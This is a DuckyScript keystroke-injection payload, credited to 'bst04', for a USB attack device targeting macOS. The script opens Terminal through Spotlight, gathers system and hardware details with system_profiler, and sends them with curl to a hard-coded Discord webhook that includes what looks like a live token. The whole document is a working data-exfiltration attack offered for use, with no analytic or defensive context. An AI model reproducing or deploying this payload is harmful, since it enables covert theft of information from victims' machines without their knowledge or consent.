REM ===========================
REM payload by bst04
REM ===========================

DELAY 1000
GUI SPACE
DELAY 250
STRING TERMINAL
DELAY 250
ENTER
DELAY 500
STRING sys=$(system_profiler SPSoftwareDataType SPHardwareDataType) 
DELAY 750
ENTER
DELAY 500
STRING curl -X POST -H "Content-Type: application/x-www-form-urlencoded" --data-urlencode "content=$sys" https://discord.com/api/webhooks/1296512673327878145/0h0RYRZEzKa3mIOsSYOJFLbRcxs5KUBhxP1oBbWdbKqbPgzKvENd8yKmyxALnTnpylOL
DELAY 1500
ENTER
DELAY 2000

